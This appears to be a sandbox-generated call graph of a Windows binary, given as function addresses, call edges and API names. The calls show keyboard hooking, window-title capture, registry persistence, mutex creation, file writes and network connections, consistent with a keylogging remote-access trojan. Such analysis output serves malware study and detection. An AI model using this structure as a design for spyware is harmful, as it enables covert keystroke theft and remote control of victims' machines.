__alloca_probe_16 48031->48035 48032->48022 48033 44aeaf 48050 435ecd 20 API calls _free 48033->48050 48034->48035 48035->48033 48036 448c33 _strftime 11 API calls 48035->48036 48038 44ae8e 48036->48038 48038->48033 48039 44ae9d WideCharToMultiByte 48038->48039 48039->48033 48040 44aedd 48039->48040 48052 435ecd 20 API calls _free 48040->48052 48043 44854a FindHandlerForForeignException 5 API calls 48042->48043 48044 448c5a 48043->48044 48047 448c63 48044->48047 48053 448cbb 10 API calls 3 library calls 48044->48053 48046 448ca3 LCMapStringW 48046->48047 48048 43502b CatchGuardHandler 5 API calls 48047->48048 48049 448cb5 48048->48049 48049->48022 48049->48030 48049->48031 48050->48022 48051->48029 48052->48022 48053->48046 48055 41cc20 LoadLibraryA GetProcAddress 48054->48055 48056 41cc10 GetModuleHandleA GetProcAddress 48054->48056 48057 41cc49 44 API calls 48055->48057 48058 41cc39 LoadLibraryA GetProcAddress 48055->48058 48056->48055 48057->47535 48058->48057 48460 41b539 FindResourceA 48059->48460 48062 43bda0 new 21 API calls 48063 40f428 ctype 48062->48063 48064 4020b7 28 API calls 48063->48064 48065 40f443 48064->48065 48066 401fe2 28 API calls 48065->48066 48067 40f44e 48066->48067 48068 401fd8 11 API calls 48067->48068 48069 40f457 48068->48069 48070 43bda0 new 21 API calls 48069->48070 48071 40f468 ctype 48070->48071 48463 406e13 48071->48463 48073 40f49b 48073->47537 48075 4020df 11 API calls 48074->48075 48095 41bebf 48075->48095 48076 41bf2f 48077 401fd8 11 API calls 48076->48077 48078 41bf61 48077->48078 48079 401fd8 11 API calls 48078->48079 48081 41bf69 48079->48081 48080 41bf31 48082 4041a2 28 API calls 48080->48082 48084 401fd8 11 API calls 48081->48084 48085 41bf3d 48082->48085 48086 40ea5f 48084->48086 48087 401fe2 28 API calls 48085->48087 48096 40fb52 48086->48096 48089 41bf46 48087->48089 48088 401fe2 28 API calls 48088->48095 48090 401fd8 11 API calls 48089->48090 48092 41bf4e 48090->48092 48091 401fd8 11 API calls 48091->48095 48094 41cec5 28 API calls 48092->48094 48094->48076 48095->48076 48095->48080 48095->48088 48095->48091 48466 4041a2 48095->48466 48469 41cec5 48095->48469 48097 40fb5e 48096->48097 48099 40fb65 48096->48099 48511 402163 11 API calls 48097->48511 48099->47545 48101 401e6d 48100->48101 48102 401e75 48101->48102 48512 402158 22 API calls 48101->48512 48102->47552 48106 4020df 11 API calls 48105->48106 48107 40532a 48106->48107 48513 4032a0 48107->48513 48109 405346 48109->47560 48518 4051ef 48110->48518 48112 406391 48522 402055 48112->48522 48115 401fe2 48116 401ff1 48115->48116 48117 402039 48115->48117 48118 4023ce 11 API calls 48116->48118 48117->47569 48119 401ffa 48118->48119 48120 40203c 48119->48120 48121 402015 48119->48121 48122 40267a 11 API calls 48120->48122 48556 403098 28 API calls 48121->48556 48122->48117 48125 401fd2 48124->48125 48126 401fc9 48124->48126 48125->47578 48557 4025e0 28 API calls 48126->48557 48558 401fab 48128->48558 48130 40d0ae CreateMutexA GetLastError 48130->47594 48559 41c048 48131->48559 48136 401fe2 28 API calls 48137 41b390 48136->48137 48138 401fd8 11 API calls 48137->48138 48139 41b398 48138->48139 48140 4135e1 31 API calls 48139->48140 48142 41b3ee 48139->48142 48141 41b3c1 48140->48141 48143 41b3cc StrToIntA 48141->48143 48142->47600 48144 41b3e3 48143->48144 48145 41b3da 48143->48145 48146 401fd8 11 API calls 48144->48146 48567 41cffa 22 API calls 48145->48567 48146->48142 48149 407765 48148->48149 48150 413584 3 API calls 48149->48150 48151 40776c 48150->48151 48151->47611 48151->47612 48153 41bd03 48152->48153 48568 40b93f 48153->48568 48155 41bd0b 48155->47628 48157 401f22 48156->48157 48158 401f6a 48156->48158 48159 402252 11 API calls 48157->48159 48165 401f09 48158->48165 48160 401f2b 48159->48160 48161 401f6d 48160->48161 48162 401f46 48160->48162 48601 402336 48161->48601 48600 40305c 28 API calls 48162->48600 48166 402252 11 API calls 48165->48166 48167 401f12 48166->48167 48167->47640 48169 4139a0 48168->48169 48170 406e13 28 API calls 48169->48170 48171 4139b5 48170->48171 48172 4020f6 28 API calls 48171->48172 48173 4139c5 48172->48173 48174 4137aa 14 API calls 48173->48174 48175 4139cf 48174->48175 48176 401fd8 11 API calls 48175->48176 48177 4139dc 48176->48177 48177->47690 48179 40209b 48178->48179 48180 4023ce 11 API calls 48179->48180 48181 4020a6 48180->48181 48605 4024ed 48181->48605 48185 4137fa 48184->48185 48187 4137c3 48184->48187 48186 401fd8 11 API calls 48185->48186 48188 40efd9 48186->48188 48189 4137d5 RegSetValueExA RegCloseKey 48187->48189 48188->47691 48189->48185 48191 43bb45 _strftime 48190->48191 48609 43ae83 48191->48609 48193 40eff2 48193->47698 48193->47699 48195 41b631 48194->48195 48196 41b596 GetLocalTime 48194->48196 48197 401fd8 11 API calls 48195->48197 48198 40531e 28 API calls 48196->48198 48199 41b639 48197->48199 48200 41b5d8 48198->48200 48201 401fd8 11 API calls 48199->48201 48202 406383 28 API calls 48200->48202 48203 40f048 48201->48203 48204 41b5e4 48202->48204 48203->47715 48636 402f10 48204->48636 48207 406383 28 API calls 48208 41b5fc 48207->48208 48641 40723b 77 API calls 48208->48641 48210 41b60a 48211 401fd8 11 API calls 48210->48211 48212 41b616 48211->48212 48213 401fd8 11 API calls 48212->48213 48214 41b61f 48213->48214 48215 401fd8 11 API calls 48214->48215 48216 41b628 48215->48216 48217 401fd8 11 API calls 48216->48217 48217->48195 48219 409e3d _wcslen 48218->48219 48220 409e48 48219->48220 48221 409e5f 48219->48221 48222 40da6f 31 API calls 48220->48222 48223 40da6f 31 API calls 48221->48223 48224 409e50 48222->48224 48225 409e67 48223->48225 48226 401f13 28 API calls 48224->48226 48227 401f13 28 API calls 48225->48227 48242 409e5a 48226->48242 48228 409e75 48227->48228 48229 401f09 11 API calls 48228->48229 48231 409e7d 48229->48231 48230 401f09 11 API calls 48232 409eb4 48230->48232 48660 409196 28 API calls 48231->48660 48645 40a144 48232->48645 48235 409e8f 48661 403014 48235->48661 48239 401f13 28 API calls 48240 409ea4 48239->48240 48241 401f09 11 API calls 48240->48241 48241->48242 48242->48230 48244 41b6c1 GetUserNameW 48243->48244 48876 40417e 48244->48876 48249 403014 28 API calls 48250 41b703 48249->48250 48251 401f09 11 API calls 48250->48251 48252 41b70c 48251->48252 48253 401f09 11 API calls 48252->48253 48254 40f25e 48253->48254 48254->47768 48256 41355b RegQueryValueExA RegCloseKey 48255->48256 48257 40f31f 48255->48257 48256->48257 48257->47641 48257->47796 48259 413a7a RegDeleteValueW 48258->48259 48260 40f3cd 48258->48260 48259->48260 48260->47635 48262 40dd96 48261->48262 48263 41353a 3 API calls 48262->48263 48264 40dd9d 48263->48264 48268 40ddbc 48264->48268 48970 401707 48264->48970 48266 40ddaa 48973 4138b2 RegCreateKeyA 48266->48973 48269 414f65 48268->48269 48270 4020df 11 API calls 48269->48270 48271 414f79 48270->48271 48993 41b944 48271->48993 48274 4020df 11 API calls 48275 414f8f 48274->48275 48276 401e65 22 API calls 48275->48276 48277 414f9d 48276->48277 48278 43bb2c _strftime 40 API calls 48277->48278 48279 414faa 48278->48279 48280 414fbc 48279->48280 48281 414faf Sleep 48279->48281 48282 402093 28 API calls 48280->48282 48281->48280 48283 414fcb 48282->48283 48284 401e65 22 API calls 48283->48284 48285 414fd4 48284->48285 48286 4020f6 28 API calls 48285->48286 48287 414fdf 48286->48287 48288 41beac 28 API calls 48287->48288 48289 414fe7 48288->48289 48997 40489e WSAStartup 48289->48997 48291 414ff1 48292 401e65 22 API calls 48291->48292 48293 414ffa 48292->48293 48294 401e65 22 API calls 48293->48294 48343 415079 48293->48343 48295 415013 48294->48295 48296 401e65 22 API calls 48295->48296 48298 415024 48296->48298 48297 4020f6 28 API calls 48297->48343 48300 401e65 22 API calls 48298->48300 48299 41beac 28 API calls 48299->48343 48301 415035 48300->48301 48303 401e65 22 API calls 48301->48303 48302 406c59 28 API calls 48302->48343 48304 415046 48303->48304 48307 401e65 22 API calls 48304->48307 48305 402f10 28 API calls 48305->48343 48306 401fe2 28 API calls 48306->48343 48308 415057 48307->48308 48309 401e65 22 API calls 48308->48309 48311 415069 48309->48311 48310 401fd8 11 API calls 48310->48343 49132 40473d 89 API calls 48311->49132 48313 40531e 28 API calls 48313->48343 48314 406383 28 API calls 48314->48343 48315 401e65 22 API calls 48315->48343 48317 4151c7 WSAGetLastError 49133 41cb72 30 API calls 48317->49133 48322 402093 28 API calls 48323 4151d7 48322->48323 48323->48322 48326 401e65 22 API calls 48323->48326 48327 401e8d 11 API calls 48323->48327 48328 43bb2c _strftime 40 API calls 48323->48328 48323->48343 48362 41b580 80 API calls 48323->48362 48363 415aac CreateThread 48323->48363 48364 401fd8 11 API calls 48323->48364 48365 401f09 11 API calls 48323->48365 49134 4052fd 28 API calls 48323->49134 49136 40b08c 85 API calls 48323->49136 49137 404e26 99 API calls 48323->49137 48326->48323 48327->48323 48329 415b0a Sleep 48328->48329 48329->48323 48330 402093 28 API calls 48330->48343 48331 41b580 80 API calls 48331->48343 48334 409097 28 API calls 48334->48343 48335 441ed1 20 API calls 48335->48343 48336 413733 3 API calls 48336->48343 48337 4135e1 31 API calls 48337->48343 48338 40417e 28 API calls 48338->48343 48342 41bc1f 28 API calls 48342->48343 48343->48297 48343->48299 48343->48302 48343->48305 48343->48306 48343->48310 48343->48313 48343->48314 48343->48315 48343->48317 48343->48323 48343->48330 48343->48331 48343->48334 48343->48335 48343->48336 48343->48337 48343->48338 48343->48342 48344 401e65 22 API calls 48343->48344 48998 414f24 48343->48998 49003 40482d 48343->49003 49010 404f51 48343->49010 49025 4048c8 connect 48343->49025 49085 41b871 48343->49085 49088 4145f8 48343->49088 49091 40ddc4 48343->49091 49097 41bcd3 48343->49097 49100 41bdaf 48343->49100 48345 415474 GetTickCount 48344->48345 48346 41bc1f 28 API calls 48345->48346 48359 415491 48346->48359 48348 41bc1f 28 API calls 48348->48359 48350 41bdaf 28 API calls 48350->48359 48353 406383 28 API calls 48353->48359 48354 402ea1 28 API calls 48354->48359 48355 402f10 28 API calls 48355->48359 48357 401fd8 11 API calls 48357->48359 48358 401f09 11 API calls 48358->48359 48359->48348 48359->48350 48359->48353 48359->48354 48359->48355 48359->48357 48359->48358 49104 41bb77 48359->49104 49106 41bb27 48359->49106 49111 40f90c 29 API calls 48359->49111 49112 402f31 28 API calls 48359->49112 49113 404c10 48359->49113 49135 404aa1 61 API calls ctype 48359->49135 48362->48323 48363->48323 49320 41ada8 105 API calls 48363->49320 48364->48323 48365->48323 48366->47553 48367->47561 48368->47565 48371 4020df 11 API calls 48370->48371 48372 406c65 48371->48372 48373 4032a0 28 API calls 48372->48373 48374 406c82 48373->48374 48374->47586 48376 40ebdf 48375->48376 48377 4135ae RegQueryValueExA RegCloseKey 48375->48377 48376->47583 48376->47601 48377->48376 48378->47591 48379->47619 48380->47611 48381->47603 48382->47618 48384 401f86 11 API calls 48383->48384 48385 40da8b 48384->48385 48386 40dae0 48385->48386 48387 40daab 48385->48387 48388 40daa1 48385->48388 48391 41c048 GetCurrentProcess 48386->48391 49321 41b645 29 API calls 48387->49321 48390 40dbd4 GetLongPathNameW 48388->48390 48393 40417e 28 API calls 48390->48393 48394 40dae5 48391->48394 48392 40dab4 48397 401f13 28 API calls 48392->48397 48398 40dbe9 48393->48398 48395 40dae9 48394->48395 48396 40db3b 48394->48396 48400 40417e 28 API calls 48395->48400 48399 40417e 28 API calls 48396->48399 48401 40dabe 48397->48401 48402 40417e 28 API calls 48398->48402 48403 40db49 48399->48403 48404 40daf7 48400->48404 48407 401f09 11 API calls 48401->48407 48405 40dbf8 48402->48405 48410 40417e 28 API calls 48403->48410 48411 40417e 28 API calls 48404->48411 49324 40de0c 28 API calls 48405->49324 48407->48388 48408 40dc0b 49325 402fa5 28 API calls 48408->49325 48413 40db5f 48410->48413 48414 40db0d 48411->48414 48412 40dc16 49326 402fa5 28 API calls 48412->49326 49323 402fa5 28 API calls 48413->49323 49322 402fa5 28 API calls 48414->49322 48418 40dc20 48421 401f09 11 API calls 48418->48421 48419 40db6a 48422 401f13 28 API calls 48419->48422 48420 40db18 48423 401f13 28 API calls 48420->48423 48424 40dc2a 48421->48424 48425 40db75 48422->48425 48426 40db23 48423->48426 48427 401f09 11 API calls 48424->48427 48428 401f09 11 API calls 48425->48428 48429 401f09 11 API calls 48426->48429 48430 40dc33 48427->48430 48431 40db7e 48428->48431 48432 40db2c 48429->48432 48433 401f09 11 API calls 48430->48433 48434 401f09 11 API calls 48431->48434 48435 401f09 11 API calls 48432->48435 48436 40dc3c 48433->48436 48434->48401 48435->48401 48437 401f09 11 API calls 48436->48437 48438 40dc45 48437->48438 48439 401f09 11 API calls 48438->48439 48440 40dc4e 48439->48440 48440->47677 48441->47688 48442->47711 48444 413759 RegQueryValueExA RegCloseKey 48443->48444 48445 41377d 48443->48445 48444->48445 48445->47670 48446->47703 48449 434563 48447->48449 48448 43bda0 new 21 API calls 48448->48449 48449->48448 48450 40f10c 48449->48450 49327 443001 7 API calls 2 library calls 48449->49327 49328 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48449->49328 49329 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48449->49329 48450->47741 48454->47772 48455->47760 48457->47805 48458->47610 48461 41b556 LoadResource LockResource SizeofResource 48460->48461 48462 40f419 48460->48462 48461->48462 48462->48062 48464 4020b7 28 API calls 48463->48464 48465 406e27 48464->48465 48465->48073 48480 40423a 48466->48480 48470 41ced2 48469->48470 48471 41cf31 48470->48471 48475 41cee2 48470->48475 48472 41cf4b 48471->48472 48473 41d071 28 API calls 48471->48473 48495 41d1d7 28 API calls 48472->48495 48473->48472 48476 41cf1a 48475->48476 48486 41d071 48475->48486 48494 41d1d7 28 API calls 48476->48494 48477 41cf2d 48477->48095 48481 404243 48480->48481 48482 4023ce 11 API calls 48481->48482 48483 40424e 48482->48483 48484 402569 28 API calls 48483->48484 48485 4041b5 48484->48485 48485->48095 48488 41d079 48486->48488 48487 41d0ab 48487->48476 48488->48487 48489 41d0af 48488->48489 48492 41d093 48488->48492 48506 402725 22 API calls 48489->48506 48496 41d0e2 48492->48496 48494->48477 48495->48477 48497 41d0ec __EH_prolog 48496->48497 48507 402717 22 API calls 48497->48507 48499 41d0ff 48508 41d1ee 11 API calls 48499->48508 48501 41d125 48502 41d15d 48501->48502 48509 402730 11 API calls 48501->48509 48502->48487 48504 41d144 48510 402712 11 API calls std::_Deallocate 48504->48510 48507->48499 48508->48501 48509->48504 48510->48502 48511->48099 48515 4032aa 48513->48515 48514 4032c9 48514->48109 48515->48514 48517 4028e8 28 API calls 48515->48517 48517->48514 48519 4051fb 48518->48519 48528 405274 48519->48528 48521 405208 48521->48112 48523 402061 48522->48523 48524 4023ce 11 API calls 48523->48524 48525 40207b 48524->48525 48552 40267a 48525->48552 48529 405282 48528->48529 48530 405288 48529->48530 48531 40529e 48529->48531 48539 4025f0 48530->48539 48533 4052f5 48531->48533 48534 4052b6 48531->48534 48549 4028a4 22 API calls 48533->48549 48538 40529c 48534->48538 48548 4028e8 28 API calls 48534->48548 48538->48521 48540 402888 22 API calls 48539->48540 48541 402602 48540->48541 48542 402672 48541->48542 48543 402629 48541->48543 48551 4028a4 22 API calls 48542->48551 48547 40263b 48543->48547 48550 4028e8 28 API calls 48543->48550 48547->48538 48548->48538 48550->48547 48553 40268b 48552->48553 48554 4023ce 11 API calls 48553->48554 48555 40208d 48554->48555 48555->48115 48556->48117 48557->48125 48560 41b362 48559->48560 48561 41c055 GetCurrentProcess 48559->48561 48562 4135e1 RegOpenKeyExA 48560->48562 48561->48560 48563 41360f RegQueryValueExA RegCloseKey 48562->48563 48564 413639 48562->48564 48563->48564 48565 402093 28 API calls 48564->48565 48566 41364e 48565->48566 48566->48136 48567->48144 48569 40b947 48568->48569 48574 402252 48569->48574 48571 40b952 48578 40b967 48571->48578 48573 40b961 48573->48155 48575 4022ac 48574->48575 48576 40225c 48574->48576 48575->48571 48576->48575 48585 402779 11 API calls std::_Deallocate 48576->48585 48579 40b9a1 48578->48579 48580 40b973 48578->48580 48597 4028a4 22 API calls 48579->48597 48586 4027e6 48580->48586 48584 40b97d 48584->48573 48585->48575 48587 4027ef 48586->48587 48588 402851 48587->48588 48589 4027f9 48587->48589 48599 4028a4 22 API calls 48588->48599 48592 402802 48589->48592 48593 402815 48589->48593 48598 402aea 28 API calls __EH_prolog 48592->48598 48595 402813 48593->48595 48596 402252 11 API calls 48593->48596 48595->48584 48596->48595 48598->48595 48600->48158 48602 402347 48601->48602 48603 402252 11 API calls 48602->48603 48604 4023c7 48603->48604 48604->48158 48606 4024f9 48605->48606 48607 40250a 28 API calls 48606->48607 48608 4020b1 48607->48608 48608->47681 48625 43ba8a 48609->48625 48611 43aeaf __cftoe 48611->48193 48612 43aed0 48615 43a837 __cftoe 36 API calls 48612->48615 48613 43ae95 48613->48611 48613->48612 48614 43aeaa 48613->48614 48630 44062d 20 API calls __dosmaperr 48614->48630 48618 43aedc 48615->48618 48619 43af0b 48618->48619 48631 43bacf 40 API calls __Tolower 48618->48631 48622 43af77 48619->48622 48632 43ba36 20 API calls 2 library calls 48619->48632 48633 43ba36 20 API calls 2 library calls 48622->48633 48623 43b03e _strftime 48623->48611 48634 44062d 20 API calls __dosmaperr 48623->48634 48626 43baa2 48625->48626 48627 43ba8f 48625->48627 48626->48613 48635 44062d 20 API calls __dosmaperr 48627->48635 48629 43ba94 __cftoe 48629->48613 48630->48611 48631->48618 48632->48622 48633->48623 48634->48611 48635->48629 48642 401fb0 48636->48642 48638 402f1e 48639 402055 11 API calls 48638->48639 48640 402f2d 48639->48640 48640->48207 48641->48210 48643 4025f0 28 API calls 48642->48643 48644 401fbd 48643->48644 48644->48638 48646 40a162 48645->48646 48647 413584 3 API calls 48646->48647 48648 40a169 48647->48648 48649 40a197 48648->48649 48650 40a17d 48648->48650 48666 409097 48649->48666 48652 40a182 48650->48652 48653 409ed6 48650->48653 48655 409097 28 API calls 48652->48655 48653->47734 48657 40a190 48655->48657 48694 40a268 29 API calls 48657->48694 48659 40a195 48659->48653 48660->48235 48853 403222 48661->48853 48663 403022 48857 403262 48663->48857 48667 4090ad 48666->48667 48668 402252 11 API calls 48667->48668 48669 4090c7 48668->48669 48695 404267 48669->48695 48671 4090d5 48672 40a1b4 48671->48672 48707 40b927 48672->48707 48675 40a205 48677 402093 28 API calls 48675->48677 48676 40a1dd 48678 402093 28 API calls 48676->48678 48679 40a210 48677->48679 48680 40a1e7 48678->48680 48681 402093 28 API calls 48679->48681 48682 41bcef 28 API calls 48680->48682 48683 40a21f 48681->48683 48684 40a1f5 48682->48684 48685 41b580 80 API calls 48683->48685 48711 40b19f 31 API calls new 48684->48711 48688 40a224 CreateThread 48685->48688 48687 40a1fc 48689 401fd8 11 API calls 48687->48689 48690 40a24b CreateThread 48688->48690 48691 40a23f CreateThread 48688->48691 48719 40a2b8 48688->48719 48689->48675 48692 401f09 11 API calls 48690->48692 48716 40a2c4 48690->48716 48691->48690 48713 40a2a2 48691->48713 48693 40a25f 48692->48693 48693->48653 48694->48659 48852 40a2ae 163 API calls 48694->48852 48696 402888 22 API calls 48695->48696 48697 40427b 48696->48697 48698 404290 48697->48698 48699 4042a5 48697->48699 48705 4042df 22 API calls 48698->48705 48700 4027e6 28 API calls 48699->48700 48704 4042a3 48700->48704 48702 404299 48706 402c48 22 API calls 48702->48706 48704->48671 48705->48702 48706->48704 48708 40b930 48707->48708 48709 40a1d2 48707->48709 48712 40b9a7 28 API calls 48708->48712 48709->48675 48709->48676 48711->48687 48712->48709 48722 40a2f3 48713->48722 48752 40ad11 48716->48752 48794 40a761 48719->48794 48723 40a30c GetModuleHandleA SetWindowsHookExA 48722->48723 48724 40a36e GetMessageA 48722->48724 48723->48724 48726 40a328 GetLastError 48723->48726 48725 40a380 TranslateMessage DispatchMessageA 48724->48725 48727 40a2ab 48724->48727 48725->48724 48725->48727 48737 41bc1f 48726->48737 48743 441ed1 48737->48743 48740 402093 28 API calls 48741 40a339 48740->48741 48742 4052fd 28 API calls 48741->48742 48744 441edd 48743->48744 48747 441ccd 48744->48747 48746 41bc43 48746->48740 48748 441ce4 48747->48748 48750 441d1b __cftoe 48748->48750 48751 44062d 20 API calls __dosmaperr 48748->48751 48750->48746 48751->48750 48781 40ad1f 48752->48781 48753 40a2cd 48754 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48756 40b93f 28 API calls 48754->48756 48756->48781 48760 40adbf GetWindowTextW 48760->48781 48762 40af17 48765 401f09 11 API calls 48762->48765 48763 41bb77 GetTickCount 48763->48781 48764 40b927 28 API calls 48764->48781 48765->48753 48766 40ae84 Sleep 48766->48781 48767 441ed1 20 API calls 48767->48781 48769 402093 28 API calls 48769->48781 48770 40ae0c 48771 409097 28 API calls 48770->48771 48770->48781 48790 40b19f 31 API calls new 48770->48790 48771->48770 48775 403014 28 API calls 48775->48781 48776 406383 28 API calls 48776->48781 48777 41bcef 28 API calls 48777->48781 48778 40a671 12 API calls 48778->48781 48779 401f09 11 API calls 48779->48781 48780 401fd8 11 API calls 48780->48781 48781->48753 48781->48754 48781->48760 48781->48762 48781->48763 48781->48764 48781->48766 48781->48767 48781->48769 48781->48770 48781->48775 48781->48776 48781->48777 48781->48778 48781->48779 48781->48780 48782 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 48781->48782 48783 401f86 48781->48783 48787 434801 23 API calls __onexit 48781->48787 48788 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 48781->48788 48789 40907f 28 API calls 48781->48789 48791 40b9b7 28 API calls 48781->48791 48792 40b783 40 API calls 2 library calls 48781->48792 48793 4052fd 28 API calls 48781->48793 48784 401f8e 48783->48784 48785 402252 11 API calls 48784->48785 48786 401f99 48785->48786 48786->48781 48787->48781 48788->48781 48789->48781 48790->48770 48791->48781 48792->48781 48795 40a776 Sleep 48794->48795 48814 40a6b0 48795->48814 48797 40a2c1 48798 40a7aa 48799 40a7b6 CreateDirectoryW 48798->48799 48806 40a788 48799->48806 48800 40a7c7 GetFileAttributesW 48800->48806 48801 401e65 22 API calls 48801->48806 48802 40a7de SetFileAttributesW 48802->48806 48804 40a858 PathFileExistsW 48804->48806 48805 4020df 11 API calls 48805->48806 48806->48795 48806->48797 48806->48798 48806->48800 48806->48801 48806->48802 48806->48804 48806->48805 48808 4020b7 28 API calls 48806->48808 48809 40a961 SetFileAttributesW 48806->48809 48810 406e13 28 API calls 48806->48810 48811 401fe2 28 API calls 48806->48811 48813 401fd8 11 API calls 48806->48813 48827 41c482 48806->48827 48837 41c516 CreateFileW 48806->48837 48845 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48806->48845 48808->48806 48809->48806 48810->48806 48811->48806 48813->48806 48815 40a75d 48814->48815 48817 40a6c6 48814->48817 48815->48806 48816 40a6e5 CreateFileW 48816->48817 48818 40a6f3 GetFileSize 48816->48818 48817->48816 48819 40a728 CloseHandle 48817->48819 48820 40a73a 48817->48820 48821 40a716 48817->48821 48822 40a71d Sleep 48817->48822 48818->48817 48818->48819 48819->48817 48820->48815 48824 409097 28 API calls 48820->48824 48846 40b117 84 API calls 48821->48846 48822->48819 48825 40a756 48824->48825 48826 40a1b4 124 API calls 48825->48826 48826->48815 48828 41c495 CreateFileW 48827->48828 48830 41c4d2 48828->48830 48831 41c4ce 48828->48831 48832 41c4f2 WriteFile 48830->48832 48833 41c4d9 SetFilePointer 48830->48833 48831->48806 48835 41c505 48832->48835 48836 41c507 CloseHandle 48832->48836 48833->48832 48834 41c4e9 CloseHandle 48833->48834 48834->48831 48835->48836 48836->48831 48838 41c540 GetFileSize 48837->48838 48839 41c53c 48837->48839 48847 40244e 48838->48847 48839->48806 48841 41c554 48842 41c566 ReadFile 48841->48842 48843 41c573 48842->48843 48844 41c575 CloseHandle 48842->48844 48843->48844 48844->48839 48845->48806 48846->48822 48848 402456 48847->48848 48850 402460 48848->48850 48851 402a51 28 API calls 48848->48851 48850->48841 48851->48850 48854 40322e 48853->48854 48863 403618 48854->48863 48856 40323b 48856->48663 48858 40326e 48857->48858 48859 402252 11 API calls 48858->48859 48860 403288 48859->48860 48861 402336 11 API calls 48860->48861 48862 403031 48861->48862 48862->48239 48864 403626 48863->48864 48865 403644 48864->48865 48866 40362c 48864->48866 48868 40365c 48865->48868 48869 40369e 48865->48869 48874 4036a6 28 API calls 48866->48874 48872 4027e6 28 API calls 48868->48872 48873 403642 48868->48873 48875 4028a4 22 API calls 48869->48875 48872->48873 48873->48856 48874->48873 48877 404186 48876->48877 48878 402252 11 API calls 48877->48878 48879 404191 48878->48879 48887 4041bc 48879->48887 48882 4042fc 48898 404353 48882->48898 48884 40430a 48885 403262 11 API calls 48884->48885 48886 404319 48885->48886 48886->48249 48888 4041c8 48887->48888 48891 4041d9 48888->48891 48890 40419c 48890->48882 48892 4041e9 48891->48892 48893 404206 48892->48893 48894 4041ef 48892->48894 48895 4027e6 28 API calls 48893->48895 48896 404267 28 API calls 48894->48896 48897 404204 48895->48897 48896->48897 48897->48890 48899 40435f 48898->48899 48902 404371 48899->48902 48901 40436d 48901->48884 48903 40437f 48902->48903 48904 404385 48903->48904 48905 40439e 48903->48905 48968 4034e6 28 API calls 48904->48968 48906 402888 22 API calls 48905->48906 48907 4043a6 48906->48907 48909 404419 48907->48909 48910 4043bf 48907->48910 48969 4028a4 22 API calls 48909->48969 48913 4027e6 28 API calls 48910->48913 48921 40439c 48910->48921 48913->48921 48921->48901 48968->48921 48976 43ab1a 48970->48976 48974 4138f4 48973->48974 48975 4138ca RegSetValueExA RegCloseKey 48973->48975 48974->48268 48975->48974 48979 43aa9b 48976->48979 48978 40170d 48978->48266 48980 43aaaa 48979->48980 48981 43aabe 48979->48981 48992 44062d 20 API calls __dosmaperr 48980->48992 48983 43aaaf __alldvrm __cftoe 48981->48983 48985 4489d7 48981->48985 48983->48978 48986 44854a FindHandlerForForeignException 5 API calls 48985->48986 48987 4489fe 48986->48987 48988 448a16 GetSystemTimeAsFileTime 48987->48988 48989 448a0a 48987->48989 48988->48989 48990 43502b CatchGuardHandler 5 API calls 48989->48990 48991 448a27 48990->48991 48991->48983 48992->48983 48994 41b98a ctype ___scrt_get_show_window_mode 48993->48994 48995 402093 28 API calls 48994->48995 48996 414f84 48995->48996 48996->48274 48997->48291 48999 414f33 48998->48999 49000 414f38 WSASetLastError 48998->49000 49138 414dc1 48999->49138 49000->48343 49004 404846 socket 49003->49004 49005 404839 49003->49005 49007 404860 CreateEventW 49004->49007 49008 404842 49004->49008 49177 40489e WSAStartup 49005->49177 49007->48343 49008->48343 49009 40483e 49009->49004 49009->49008 49011 404f65 49010->49011 49012 404fea 49010->49012 49013 404f6e 49011->49013 49014 404fc0 CreateEventA CreateThread 49011->49014 49015 404f7d GetLocalTime 49011->49015 49012->48343 49013->49014 49014->49012 49179 405150 49014->49179 49016 41bc1f 28 API calls 49015->49016 49017 404f91 49016->49017 49178 4052fd 28 API calls 49017->49178 49026 404a1b 49025->49026 49027 4048ee 49025->49027 49028 40497e 49026->49028 49029 404a21 WSAGetLastError 49026->49029 49027->49028 49030 404923 49027->49030 49032 40531e 28 API calls 49027->49032 49028->48343 49029->49028 49031 404a31 49029->49031 49183 420cf1 27 API calls 49030->49183 49033 404932 49031->49033 49034 404a36 49031->49034 49036 40490f 49032->49036 49039 402093 28 API calls 49033->49039 49188 41cb72 30 API calls 49034->49188 49040 402093 28 API calls 49036->49040 49038 40492b 49038->49033 49042 404941 49038->49042 49043 404a80 49039->49043 49044 40491e 49040->49044 49041 404a40 49189 4052fd 28 API calls 49041->49189 49049 404950 49042->49049 49050 404987 49042->49050 49046 402093 28 API calls 49043->49046 49047 41b580 80 API calls 49044->49047 49051 404a8f 49046->49051 49047->49030 49053 402093 28 API calls 49049->49053 49185 421ad1 54 API calls 49050->49185 49054 41b580 80 API calls 49051->49054 49057 40495f 49053->49057 49054->49028 49063 402093 28 API calls 49057->49063 49058 40498f 49060 4049c4 49058->49060 49061 404994 49058->49061 49187 420e97 28 API calls 49060->49187 49064 402093 28 API calls 49061->49064 49066 40496e 49063->49066 49068 4049a3 49064->49068 49069 41b580 80 API calls 49066->49069 49071 402093 28 API calls 49068->49071 49072 404973 49069->49072 49070 4049cc 49073 4049f9 CreateEventW CreateEventW 49070->49073 49075 402093 28 API calls 49070->49075 49074 4049b2 49071->49074 49184 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 49072->49184 49073->49028 49076 41b580 80 API calls 49074->49076 49078 4049e2 49075->49078 49079 4049b7 49076->49079 49080 402093 28 API calls 49078->49080 49186 421143 52 API calls 49079->49186 49081 4049f1 49080->49081 49083 41b580 80 API calls 49081->49083 49084 4049f6 49083->49084 49084->49073 49190 41b847 GlobalMemoryStatusEx 49085->49190 49087 41b886 49087->48343 49191 4145bb 49088->49191 49092 40dde0 49091->49092 49093 41353a 3 API calls 49092->49093 49095 40dde7 49093->49095 49094 40ddff 49094->48343 49095->49094 49096 413584 3 API calls 49095->49096 49096->49094 49098 4020b7 28 API calls 49097->49098 49099 41bce8 49098->49099 49099->48343 49101 41bdbc 49100->49101 49102 4020b7 28 API calls 49101->49102 49103 41bdce 49102->49103 49103->48343 49105 41bb8d GetTickCount 49104->49105 49105->48359 49107 436f10 ___scrt_get_show_window_mode 49106->49107 49108 41bb46 GetForegroundWindow GetWindowTextW 49107->49108 49109 40417e 28 API calls 49108->49109 49110 41bb70 49109->49110 49110->48359 49111->48359 49112->48359 49114 4020df 11 API calls 49113->49114 49115 404c27 49114->49115 49116 4020df 